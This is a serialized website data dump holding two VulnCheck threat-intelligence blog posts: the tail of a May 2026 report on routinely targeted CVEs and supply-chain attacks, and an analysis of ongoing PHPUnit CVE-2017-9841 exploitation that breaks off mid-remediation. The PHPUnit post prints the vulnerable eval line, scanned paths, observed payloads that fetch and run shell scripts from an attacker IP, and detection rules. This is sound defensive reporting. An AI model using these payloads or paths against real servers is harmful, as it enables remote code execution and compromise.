ransomware"," group more than a month prior to public disclosure.",[18,950,951],{},"Citrix NetScaler, Palo Alto Networks PAN-OS, and Fortinet FortiOS have all had their own well-covered zero-day disclosures over the first few months of this year, though none of them have enough publicly reported threat activity to qualify for “Routinely Targeted” status:",[22,953,954,960,972],{},[25,955,956,959],{},[295,957,958],{},"Citrix NetScaler CVE-2026-3055:"," Requires an uncommon configuration and a noisy attack, and even then, the attacker doesn't control which types of data are returned",[25,961,962,965,966,971],{},[295,963,964],{},"Palo Alto Networks PAN-OS CVE-2026-0300:"," An unspecified buffer overflow vulnerability in PAN-OS’s Captive Portal that lets a remote attacker execute arbitrary code as root and was ",[47,967,970],{"href":968,"rel":969},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fcaptive-portal-zero-day\u002F",[51],"exploited"," pre-disclosure by “likely state-sponsored” adversaries",[25,973,974,982,983,991],{},[295,975,976,977],{},"Fortinet FortiClient EMS ",[47,978,981],{"href":979,"rel":980},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-26-099",[51],"CVE-2026-35616"," and ",[295,984,985,986],{},"FortiCloud ",[47,987,990],{"href":988,"rel":989},"https:\u002F\u002Ffortiguard.fortinet.com\u002Fpsirt\u002FFG-IR-26-060",[51],"CVE-2026-24858"," were both exploited as zero-days by unattributed threat actors",[993,994,888],"h3",{"id":995},"a-note-on-cisco-sd-wan-cves",[18,997,998,999,1004,1005,1010],{},"In February 2026, the Cisco Talos team published a blog on UAT-8616 exploitation of two vulnerabilities in Catalyst SD-WAN: An older flaw, CVE-2022-20775, and a new initial access zero-day, CVE-2026-20127. The same day, Cisco published an ",[47,1000,1003],{"href":1001,"rel":1002},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-sdwan-authbp-qwCX8D4v",[51],"aggregate advisory"," for five additional vulnerabilities in Catalyst SD-WAN that the VulnCheck team analyzed and ",[47,1006,1009],{"href":1007,"rel":1008},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcisco-sd-wan-manager-vulns",[51],"wrote about here",". None of these five CVEs was exploited at time of disclosure; as of May 18, all but one have been used in the wild.",[18,1012,1013,1014,1018,1019,1024],{},"Part of VulnCheck’s SD-WAN ",[47,1015,1017],{"href":1007,"rel":1016},[51],"analysis"," back in early March was that a public PoC ostensibly targeting CVE-2026-20127 — i.e., the SD-WAN initial access zero-day that drew most of the attention — actually wasn’t hitting that CVE at all, but rather three other vulnerabilities from Cisco’s aggregate disclosure: CVE-2026-20122, CVE-2026-20128, and CVE-2026-20133. On May 14, Cisco Talos ",[47,1020,1023],{"href":1021,"rel":1022},"https:\u002F\u002Fblog.talosintelligence.com\u002Fsd-wan-ongoing-exploitation\u002F",[51],"published a new blog"," on ongoing exploitation of SD-WAN vulnerabilities noting that the same public PoC (“XenShell”) was driving widespread exploitation to deploy webshells. Because Cisco Talos’s May 14 blog contains details on 10 different threat clusters exploiting SD-WAN vulnerabilities, we have classified CVE-2026-20127 and the three “XenShell” CVEs as routinely targeted.",[61,1026,1028],{"id":1027},"most-researched-cves","Most Researched CVEs",[18,1030,1031],{},"While there’s usually some overlap between CVEs that security researchers develop exploits for and the CVEs that get exploited in the wild, researchers tend to prioritize exploit development for vulnerabilities in open-source or free software they can access easily, whereas adversaries are more opportunistic (translation: not constrained by terms of use or things like “legality”). 2026 so far has followed this same pattern — the CVEs with the highest number of public exploits are primarily in open or otherwise accessible code bases.",[18,1033,1034,1035,1040,1041,1044],{},"The most researched vulnerability of 2026 so far is CVE-2026-31431, aka “Copy Fail,” a Linux kernel privilege escalation flaw that was discovered with AI assistance and disclosed with some of the most spectacularly FUD-driven marketing we’ve witnessed to date. Nevertheless, the vulnerability is legitimate, though the community should note that the original PoC released with the vuln ",[47,1036,1039],{"href":1037,"rel":1038},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-05-08#cve-2026-31431-copy-fail-linux-kernel-local-privilege-escalation",[51],"was destructive"," and would overwrite the ",[886,1042,1043],{},"su"," binary. Copy Fail has spawned 130+ working PoCs and counting, almost all of which are derivative rather than novel implementations. Other highly researched 2026 vulnerabilities so far include:",[22,1046,1047,1057,1063,1069,1081],{},[25,1048,1049,1052,1053,1056],{},[295,1050,1051],{},"CVE-2026-20841:"," A critical auth bypass via argument injection in Gnu Inetutils ",[886,1054,1055],{},"telnetd"," with nearly 50 known exploits; the vuln has also been operationalized by the Qilin ransomware family",[25,1058,1059,1062],{},[295,1060,1061],{},"CVE-2026-41940:"," Broadly exploited cPanel and WHM authentication bypass with 25+ public exploits",[25,1064,1065,1068],{},[295,1066,1067],{},"CVE-2026-23744:"," A missing auth vulnerability in MCPJam Inspector, a popular MCP development and testing platform, with 19 public exploits and a variety of VulnCheck Canary detections",[25,1070,1071,1074,1075,1080],{},[295,1072,1073],{},"CVE-2026-33017:"," A critical code injection RCE bug in popular agentic platform Langflow with a dozen-ish exploits, whose exploitation Sysdig’s threat research group ",[47,1076,1079],{"href":1077,"rel":1078},"https:\u002F\u002Fwww.sysdig.com\u002Fblog\u002Fcve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours",[51],"catalogued"," in depth in March",[25,1082,1083,1086],{},[295,1084,1085],{},"CVE-2026-21858 (aka “Ni8mare”):"," An infoleak vulnerability in workflow automation platform n8n that VulnCheck Canaries have seen expansive scanning and exploit attempts for; it’s also seen Zerobot exploitation",[18,1088,1089],{},"Several other vulnerabilities with 10+ public exploits were omitted from this list because they haven’t yet seen real-world exploitation, including CVE-2025-2304 (Camaleon CMS), CVE-2026-29000 (pac4j-jwt JwtAuthenticator), and CVE-2026-20841 (Windows Notepad).",[61,1091,1093],{"id":1092},"the-year-of-the-supply-chain-attack","The Year of the Supply Chain Attack?",[18,1095,1096,1097,1102,1103,1108,1109,1114,1115,1120,1121,1126],{},"Our 2026 Routinely Targeted Vulnerabilities list also includes two CVEs used to mark significant supply chain incidents in a chaotic year for supply chain security: CVE-2025-15556 tracked a Notepad++ ",[47,1098,1101],{"href":1099,"rel":1100},"https:\u002F\u002Fnotepad-plus-plus.org\u002Fnews\u002Fhijacked-incident-info-update\u002F",[51],"infrastructure compromise"," that “allowed malicious actors to intercept and redirect update traffic destined for notepad-plus-plus.org.” The incident occurred across more than half of 2025 before the maintainers discovered and disclosed it in February 2026. In their analysis of a custom backdoor, security firm Rapid7 ",[47,1104,1107],{"href":1105,"rel":1106},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002Ftr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit\u002F",[51],"attributed the incident"," to Chinese state-sponsored threat actor ",[47,1110,1113],{"href":1111,"rel":1112},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FLotus%20Blossom",[51],"Lotus Blossom",", which commonly targets organizations in Southeast Asia. Also included in our 2026 data is CVE-2026-33634, which tracked a far-reaching supply chain compromise that started upstream with popular vulnerability scanner Trivy and ",[47,1116,1119],{"href":1117,"rel":1118},"https:\u002F\u002Fsnyk.io\u002Fblog\u002Fpoisoned-security-scanner-backdooring-litellm\u002F",[51],"spread to LiteLLM"," and Checkmarx KICS — LiteLLM alone had 3.4 million daily downloads. The attack was attributed to TeamPCP, a financially motivated threat group who’s claimed a ",[47,1122,1125],{"href":1123,"rel":1124},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F26\u002Fe\u002Fanalyzing-teampcp-supply-chain-attacks.html",[51],"spate of supply chain attacks"," this year.",[18,1128,1129,1130,1134,1135,1140,1141,982,1146,1151,1152,1157,1158,1163,1164,1169,1170,1175],{},"There’s much debate in the CVE community over whether CVEs are the right mechanism to track and report on supply chain compromises. For better or worse, CVEs ",[1131,1132,1133],"em",{},"are"," commonly used to denote backdoored or otherwise compromised software versions, but they’re not used consistently. March 2026’s axios npm supply chain ",[47,1136,1139],{"href":1137,"rel":1138},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fsupply-chain-compromise-axios-npm-package",[51],"incident",", for instance, put tens of millions of users at risk after the hugely popular package was poisoned with a cross-platform RAT in an attack ",[47,1142,1145],{"href":1143,"rel":1144},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fnorth-korea-threat-actor-targets-axios-npm-package",[51],"Google Threat Intel",[47,1147,1150],{"href":1148,"rel":1149},"https:\u002F\u002Fwww.elastic.co\u002Fsecurity-labs\u002Faxios-one-rat-to-rule-them-all",[51],"Elastic"," attributed to North Korea. The only CVE assigned was ",[47,1153,1156],{"href":1154,"rel":1155},"https:\u002F\u002Fgithub.com\u002Fusebruno\u002Fbruno\u002Fsecurity\u002Fadvisories\u002FGHSA-658g-p7jg-wx5g",[51],"CVE-2026-34381",", which a downstream package (@usebruno\u002Fcli) apparently used to track impact from the axios compromise. On May 11, the maintainers of TanStack, another popular package, disclosed another TeamPCP-attributed ",[47,1159,1162],{"href":1160,"rel":1161},"https:\u002F\u002Ftanstack.com\u002Fblog\u002Fnpm-supply-chain-compromise-postmortem",[51],"supply chain attack"," that compromised ",[47,1165,1168],{"href":1166,"rel":1167},"https:\u002F\u002Fsnyk.io\u002Fblog\u002Ftanstack-npm-packages-compromised\u002F",[51],"40+ packages"," via the self-spreading “",[47,1171,1174],{"href":1172,"rel":1173},"https:\u002F\u002Fwww.stepsecurity.io\u002Fblog\u002Fmini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem",[51],"mini Shai-Hulud","” worm.",[61,1177,1179],{"id":1178},"_2026-vulncheck-kev-trending","2026 VulnCheck KEV Trending",[18,1181,1182,1183,1186],{},"VulnCheck’s industry-leading Known Exploited Vulnerabilities (KEV) list has added 394 new CVEs with in-the-wild exploitation evidence so far this year — a ",[295,1184,1185],{},"59% increase"," in new KEVs when compared with the same period last year. VulnCheck’s research team has also observed a noticeably higher volume of prior-year CVEs (i.e., “CVE-2025” vulnerabilities) racking up first-time exploitation evidence year over year — meaning both the number of exploited “CVE-2026” flaws and net-new reports of prior year (“CVE-2025”) exploitation have increased significantly this year.",[18,1188,1189,1190,1193,1194,1199],{},"But it also bears noting that overall CVE volume is ",[1131,1191,1192],{},"also"," up in 2026, and major CNAs are starting to show significant shifts (upticks) in CVE disclosures, as our research team ",[47,1195,1198],{"href":1196,"rel":1197},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fai-assisted-vulnerability-discovery",[51],"wrote about"," just last week. Thus far, the higher volume of new KEVs appears to be roughly proportional to overall CVE volume growth, which is to say that AI is contributing to an acceleration of known patterns in vulnerability disclosure and exploitation.",[61,1201,202],{"id":201},[18,1203,1204],{},"VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit patterns across our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus.",[18,1206,1207,1208,1213,1214,1219,1220],{},"For more analysis of vulnerability and exploit trends, see the ",[47,1209,1212],{"href":1210,"rel":1211},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report",[51],"2026 VulnCheck Exploit Intelligence Report",", or check out or our blogs ",[47,1215,1218],{"href":1216,"rel":1217},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnetwork-edge-device-report-2026",[51],"2026 State of Exploitation: Exploiting The Network Edge"," and\n",[1131,1221,1222,59],{},[47,1223,1225],{"href":1196,"rel":1224},[51],"The First CVE Wave: Signs That AI-Assisted Vulnerability Discovery Is Reshaping Disclosure Volumes",[18,1227,1228,1229,1234,1235,1240,1241,1246,1247,1246,1252,1255,1256,1260],{},"Sign up for the VulnCheck community today to get free access to our ",[47,1230,1233],{"href":1231,"rel":1232},"https:\u002F\u002Fwww.vulncheck.com\u002Fkev",[51],"VulnCheck KEV",", enjoy our comprehensive ",[47,1236,1239],{"href":1237,"rel":1238},"https:\u002F\u002Fconsole.vulncheck.com\u002Fbrowse",[51],"vulnerability data",", and request a trial of our ",[47,1242,1245],{"href":1243,"rel":1244},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[51],"Initial Access Intelligence",", ",[47,1248,1251],{"href":1249,"rel":1250},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fip-intelligence",[51],"IP Intelligence",[47,1253,283],{"href":281,"rel":1254},[51],", and ",[47,1257,216],{"href":1258,"rel":1259},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fexploit-intelligence",[51]," products.",{"title":219,"searchDepth":220,"depth":220,"links":1262},[1263,1267,1268,1269,1270],{"id":895,"depth":220,"text":896,"children":1264},[1265],{"id":995,"depth":1266,"text":888},3,{"id":1027,"depth":220,"text":1028},{"id":1092,"depth":220,"text":1093},{"id":1178,"depth":220,"text":1179},{"id":201,"depth":220,"text":202},"2026-05-21","VulnCheck identified 25 CVEs disclosed in 2026 that have been routinely targeted by adversaries and researchers so far this year, drawing from a global body of exploit code and exploitation data.",{"slug":1274},"routinely-targeted-vulnerabilities-may-2026","\u002Fblog\u002Froutinely-targeted-vulnerabilities-may-2026",{"title":247,"description":1272},"blog\u002Froutinely-targeted-vulnerabilities-may-2026",[242,1279,1280,1281],"kev","vuln-intel","initial-access","uBpw_PVohgwz9oUF9uuyNhVkIwMDZnsetLKjPUBzIR4",{"id":1284,"title":1285,"articles":7,"authors":1286,"body":1291,"date":2934,"description":2935,"extension":234,"image":7,"link":7,"meta":2936,"navigation":237,"path":2937,"seo":2938,"series":7,"stem":2939,"subtype":7,"tags":2940,"__hash__":2944},"blog\u002Fblog\u002Fcve-2017-9841.md","9 Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities",[1287],{"name":1288,"link":1289,"linkName":1290},"Neal Dennis","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fmyprofiledennis","in\u002Fmyprofiledennis",{"type":15,"value":1292,"toc":2904},[1293,1307,1310,1313,1328,1331,1334,1336,1340,1347,1353,1362,1365,1414,1417,1420,1422,1426,1436,1443,1447,1450,1498,1516,1520,1523,1529,1536,1540,1543,1589,1591,1595,1602,1605,1609,1628,1646,1650,1660,1664,1667,1671,1688,1690,1694,1705,1707,1711,1716,1722,1739,1744,1766,1771,1777,1779,1783,1788,1898,1900,1904,1911,1914,1917,1919,1924,1934,1936,1940,1943,2062,2106,2108,2112,2115,2187,2193,2243,2250,2252,2256,2260,2291,2295,2302,2308,2314,2348,2353,2404,2408,2433,2435,2439,2442,2448,2450,2454,2457,2733,2735,2739,2845,2847,2851,2887,2889,2891,2893,2895,2900],[18,1294,1295,1298,1299,1302,1303,1306],{},[295,1296,1297],{},"CVE:"," CVE-2017-9841 | ",[295,1300,1301],{},"CVSS:"," 9.8 Critical | ",[295,1304,1305],{},"EPSS:"," 94.2% (99.9th percentile)",[1308,1309],"hr",{},[18,1311,1312],{},"Some vulnerabilities get patched, forgotten, and fade into the historical record. CVE-2017-9841 is not one of them.",[18,1314,1315,1316,1319,1320,1323,1324,1327],{},"Nearly a decade after PHPUnit's ",[886,1317,1318],{},"eval-stdin.php"," file was identified as a trivially exploitable remote code execution vector, VulnCheck Canary data shows the vulnerability is one of the most actively targeted in our systems, with over ",[295,1321,1322],{},"80,000 exploitation attempts detected in the last 30 days"," across our global Canaries network, and more than ",[295,1325,1326],{},"36,500 hits in just the last 10 days",". Attackers haven't moved on. If anything, the scanning infrastructure has grown more sophisticated.",[18,1329,1330],{},"This post breaks down what's happening, who's scanning, how the attack works, and what defenders should do about it in 2026.",[18,1332,1333],{},"This report is based on data from the last 30 days, ending 11 May.",[1308,1335],{},[61,1337,1339],{"id":1338},"what-is-cve-2017-9841","What Is CVE-2017-9841?",[18,1341,1342,1343,1346],{},"CVE-2017-9841 is a remote code execution vulnerability in ",[295,1344,1345],{},"PHPUnit",", the widely used PHP testing framework. It was disclosed in June 2017 and affects versions prior to 4.8.28 and 5.x before 5.6.3.",[18,1348,1349,1350,1352],{},"The vulnerability exists in a file called ",[886,1351,1318],{},", located at:",[1354,1355,1360],"pre",{"className":1356,"code":1358,"language":1359,"meta":219},[1357],"language-text","vendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n","text",[886,1361,1358],{"__ignoreMap":219},[18,1363,1364],{},"This file was included in PHPUnit for testing purposes and contains a single, devastating line:",[1354,1366,1370],{"className":1367,"code":1368,"language":1369,"meta":219,"style":219},"language-php shiki shiki-themes material-theme-lighter github-light github-dark monokai","eval('?>' . file_get_contents('php:\u002F\u002Finput'));\n","php",[886,1371,1372],{"__ignoreMap":219},[1373,1374,1377,1381,1385,1389,1393,1395,1399,1402,1404,1406,1409,1411],"span",{"class":1375,"line":1376},"line",1,[1373,1378,1380],{"class":1379},"sMLJd","eval",[1373,1382,1384],{"class":1383},"swvn1","(",[1373,1386,1388],{"class":1387},"siCPE","'",[1373,1390,1392],{"class":1391},"sLACW","?>",[1373,1394,1388],{"class":1387},[1373,1396,1398],{"class":1397},"sGXK2"," .",[1373,1400,1401],{"class":1379}," file_get_contents",[1373,1403,1384],{"class":1383},[1373,1405,1388],{"class":1387},[1373,1407,1408],{"class":1391},"php:\u002F\u002Finput",[1373,1410,1388],{"class":1387},[1373,1412,1413],{"class":1383},"));\n",[18,1415,1416],{},"When an attacker sends a POST request to this file with PHP code in the request body, the server executes it with no authentication required, no special headers needed. It's about as clean an RCE as you'll find.",[18,1418,1419],{},"The root cause isn't a subtle logical flaw or a memory corruption bug. It's a testing utility that was never meant to be exposed to the internet, shipped inside a Composer dependency, and left accessible in production environments that failed to exclude development dependencies from their deployment artifacts.",[1308,1421],{},[61,1423,1425],{"id":1424},"vulncheck-canary-data-what-were-seeing-right-now","VulnCheck Canary Data: What We're Seeing Right Now",[18,1427,1428,1429,1432,1433,59],{},"VulnCheck Canaries are purpose-built devices designed to detect real-world exploitation attempts against known vulnerabilities. Over the past 30 days, our Canaries have logged ",[295,1430,1431],{},"80,119 CVE-2017-9841 exploitation attempts",", all matching the signature ",[886,1434,1435],{},"VULNCHECK PHPUnit CVE-2017-9841 Exploit Attempt",[18,1437,1438,1439,1442],{},"In the last 10 days alone, that number stands at ",[295,1440,1441],{},"36,543 hits"," — indicating sustained, ongoing campaign activity rather than a one-time burst.",[993,1444,1446],{"id":1445},"botnet-infrastructure","Botnet Infrastructure",[18,1448,1449],{},"The majority of observed traffic is originating from a small number of IPs, with the most active being:",[307,1451,1452,1468],{},[310,1453,1454],{},[313,1455,1456,1459,1462,1465],{},[316,1457,1458],{},"Source IP",[316,1460,1461],{},"ASN",[316,1463,1464],{},"Country",[316,1466,1467],{},"Notable",[336,1469,1470,1484],{},[313,1471,1472,1475,1478,1481],{},[341,1473,1474],{},"185.38.148.2",[341,1476,1477],{},"AS25369 – Hydra Communications Ltd",[341,1479,1480],{},"United Kingdom",[341,1482,1483],{},"Primary scanner",[313,1485,1486,1489,1492,1495],{},[341,1487,1488],{},"66.179.137.126",[341,1490,1491],{},"AS8560 – IONOS SE",[341,1493,1494],{},"United States",[341,1496,1497],{},"Secondary scanner",[18,1499,1500,1501,1503,1504,1507,1508,1511,1512,1515],{},"IP ",[886,1502,1474],{}," is particularly active and this host is not exclusively targeting CVE-2017-9841. Our Canary logs show the same IP simultaneously probing for ",[295,1505,1506],{},"CVE-2022-47945"," (ThinkPHP RCE), ",[295,1509,1510],{},"CVE-2024-4577"," (PHP CGI argument injection), and ",[295,1513,1514],{},"CVE-2021-41773"," (Apache path traversal RCE). This is mass-scanning infrastructure running a multi-exploit playbook against any reachable web server.",[993,1517,1519],{"id":1518},"path-enumeration","Path Enumeration",[18,1521,1522],{},"What makes these scans notable is the exhaustive path enumeration. Rather than checking a single well-known location, attackers are probing dozens of framework-specific paths in sequence, reflecting a thorough understanding of how PHP projects are structured:",[1354,1524,1527],{"className":1525,"code":1526,"language":1359,"meta":219},[1357],"\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flaravel\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fdrupal\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fyii\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fzend\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fwordpress\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcms\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcrm\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fadmin\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fbackup\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapi\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fpublic\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n... (30+ paths per scan session)\n",[886,1528,1526],{"__ignoreMap":219},[18,1530,1531,1532,1535],{},"This breadth means the scanner is optimized to find PHPUnit in non-standard installation locations, not just the obvious ",[886,1533,1534],{},"\u002Fvendor\u002F"," root but nested under application subdirectories, framework scaffolding, and common alias paths. A typical scan session hits 20–30 paths in rapid succession.",[993,1537,1539],{"id":1538},"vulncheck-observed-payloads","VulnCheck-Observed Payloads",[18,1541,1542],{},"The POST payloads observed include:",[22,1544,1545,1563,1573,1583],{},[25,1546,1547,1550,1551,1554,1555,1558,1559,1562],{},[295,1548,1549],{},"Shell downloads:"," Fetching remote shell scripts via ",[886,1552,1553],{},"wget"," or ",[886,1556,1557],{},"curl"," from attacker-controlled infrastructure (e.g., ",[886,1560,1561],{},"https:\u002F\u002F125.135.169.171\u002Fsh",") and executing them",[25,1564,1565,1568,1569,1572],{},[295,1566,1567],{},"PHP webshell probing:"," Using ",[886,1570,1571],{},"\u003C?php shell_exec(base64_decode(...))"," to execute encoded commands, often including credential theft or pivoting scripts",[25,1574,1575,1578,1579,1582],{},[295,1576,1577],{},"Fingerprinting:"," Some payloads use ",[886,1580,1581],{},"echo(md5(\"Hello CVE-2024-4577\"))"," style responses to verify code execution before deploying more aggressive payloads",[25,1584,1585,1588],{},[295,1586,1587],{},"Multi-CVE chaining:"," The same connection bundle includes attempts against CVE-2024-4577 (PHP CGI) and CVE-2017-9841 simultaneously, suggesting the tooling probes multiple PHP attack vectors in a single connection sweep",[1308,1590],{},[61,1592,1594],{"id":1593},"why-is-this-still-happening-in-2026","Why Is This Still Happening in 2026?",[18,1596,1597,1598,1601],{},"This is the real question. The vulnerability was patched in mid-2017. CISA added it to the Known Exploited Vulnerabilities catalog in February 2022. It carries an EPSS score of ",[295,1599,1600],{},"94.2% — placing it in the 99.9th percentile"," of all CVEs by exploitation probability.",[18,1603,1604],{},"So why are attackers still finding victims?",[993,1606,1608],{"id":1607},"_1-composer-dependencies-dont-self-clean","1. Composer Dependencies Don't Self-Clean",[18,1610,1611,1612,1615,1616,1619,1620,1623,1624,1627],{},"PHPUnit is a development dependency. It's listed in ",[886,1613,1614],{},"composer.json"," under ",[886,1617,1618],{},"require-dev",", not ",[886,1621,1622],{},"require",". The intended deployment pattern is to run ",[886,1625,1626],{},"composer install --no-dev"," in production, which excludes testing dependencies including PHPUnit.",[18,1629,1630,1631,1634,1635,1638,1639,1642,1643,1645],{},"In practice, many deployments skip this step. Teams run ",[886,1632,1633],{},"composer install"," without the ",[886,1636,1637],{},"--no-dev"," flag during CI\u002FCD pipelines that also serve production environments. Or they install with dev dependencies for debugging, and those files never get removed. The ",[886,1640,1641],{},"vendor\u002F"," directory ends up in production with ",[886,1644,1318],{}," intact and web-accessible.",[993,1647,1649],{"id":1648},"_2-the-vendor-directory-gets-web-served","2. The Vendor Directory Gets Web-Served",[18,1651,1652,1653,1655,1656,1659],{},"PHP applications running on Apache or Nginx often serve the entire project directory, including ",[886,1654,1641],{},". Unless there's an explicit server rule blocking access to ",[886,1657,1658],{},"vendor\u002Fphpunit\u002F",", the file is reachable at a predictable URL.",[993,1661,1663],{"id":1662},"_3-legacy-codebases-dont-get-updated","3. Legacy Codebases Don't Get Updated",[18,1665,1666],{},"Many PHP applications are maintained by small teams or individuals who installed dependencies years ago and haven't revisited them. The underlying application may be working fine, so no one updates PHPUnit from 4.x to a patched version. The dependency stays frozen, vulnerable, and accessible.",[993,1668,1670],{"id":1669},"_4-the-attack-tool-ecosystem-is-mature","4. The Attack Tool Ecosystem Is Mature",[18,1672,1673,1674,1677,1678,1246,1681,1246,1684,1687],{},"Our exploit intelligence index shows ",[295,1675,1676],{},"18 public exploits"," for CVE-2017-9841, including dedicated mass-scanners (",[886,1679,1680],{},"phpunit-brute",[886,1682,1683],{},"laravel-phpunit-rce-masscaner",[886,1685,1686],{},"PHPUnit-GoScan","), Nuclei templates, Metasploit modules, and a weaponized initial-access module. The barrier to running this scan is approximately zero.",[1308,1689],{},[61,1691,1693],{"id":1692},"botnet-attribution","Botnet Attribution",[18,1695,1696,1697,1700,1701,1704],{},"VulnCheck's exploit intelligence data shows CVE-2017-9841 has been leveraged by ",[295,1698,1699],{},"several botnets"," including ",[295,1702,1703],{},"RondoDox, Kinsing, KashmirBlack, Sysrv and Androxgh0st",". Persistent Botnet activity was first observed in 2020 and remains active as recently as May 2026. This is not opportunistic one-off scanning — it's embedded in the standing playbooks of criminal infrastructure that systematically sweeps the internet for exploitable PHP applications.",[1308,1706],{},[61,1708,1710],{"id":1709},"detection","Detection",[18,1712,1713],{},[295,1714,1715],{},"What to look for in web server logs:",[1354,1717,1720],{"className":1718,"code":1719,"language":1359,"meta":219},[1357],"POST \u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\nPOST \u002F*\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n",[886,1721,1719],{"__ignoreMap":219},[18,1723,1724,1725,982,1728,1730,1731,1734,1735,1738],{},"Any POST request to a path containing ",[886,1726,1727],{},"phpunit",[886,1729,1318],{}," is a red flag regardless of response code. A ",[886,1732,1733],{},"200 OK"," indicates successful exploitation. A ",[886,1736,1737],{},"404"," means the file wasn't found — but your system may still be vulnerable if the file exists elsewhere.",[18,1740,1741],{},[295,1742,1743],{},"Network-level indicators:",[22,1745,1746,1753,1760],{},[25,1747,1748,1749,1752],{},"User-agent: ",[886,1750,1751],{},"libredtail-http"," (observed in current campaigns)",[25,1754,1755,1756,1759],{},"PHP webshell beaconing to ",[886,1757,1758],{},"125.135.169.171"," (observed C2 in active payloads)",[25,1761,1762,1763,1765],{},"High-frequency sequential requests to 20+ ",[886,1764,1727],{}," paths from a single IP",[18,1767,1768],{},[295,1769,1770],{},"SIEM\u002FWAF rules to add:",[1354,1772,1775],{"className":1773,"code":1774,"language":1359,"meta":219},[1357],"uri_path contains \"eval-stdin.php\" AND request_method = \"POST\"\nuri_path contains \"phpunit\" AND uri_path contains \"Util\u002FPHP\"\n",[886,1776,1774],{"__ignoreMap":219},[1308,1778],{},[61,1780,1782],{"id":1781},"remediation","Remediation",[18,1784,1785],{},[295,1786,1787],{},"If you run PHP applications:",[1789,1790,1791,1801,1813,1883,1889],"ol",{},[25,1792,1793,1796,1797,1800],{},[295,1794,1795],{},"Audit your vendor directory."," Check whether ",[886,1798,1799],{},"vendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php"," exists on any internet-facing server. If it does, you have a problem regardless of whether you've been exploited.",[25,1802,1803,1806,1807,1809,1810,1812],{},[295,1804,1805],{},"Redeploy without dev dependencies."," Run ",[886,1808,1626],{}," in all production environments and remove the existing ",[886,1811,1641],{}," directory before reinstalling.",[25,1814,1815,1818,1819,1821,1822,1825,1828,1856,1858,1861],{},[295,1816,1817],{},"Block web access to vendor\u002F."," Add server-level rules to deny HTTP access to your ",[886,1820,1641],{}," directory entirely. This should be standard practice regardless of PHPUnit. ",[1823,1824],"br",{},[295,1826,1827],{},"Nginx:",[1354,1829,1833],{"className":1830,"code":1831,"language":1832,"meta":219,"style":219},"language-nginx shiki shiki-themes material-theme-lighter github-light github-dark monokai","location ~* \u002Fvendor\u002F {\n deny all;\n return 403;\n}\n","nginx",[886,1834,1835,1840,1845,1850],{"__ignoreMap":219},[1373,1836,1837],{"class":1375,"line":1376},[1373,1838,1839],{},"location ~* \u002Fvendor\u002F {\n",[1373,1841,1842],{"class":1375,"line":220},[1373,1843,1844],{}," deny all;\n",[1373,1846,1847],{"class":1375,"line":1266},[1373,1848,1849],{}," return 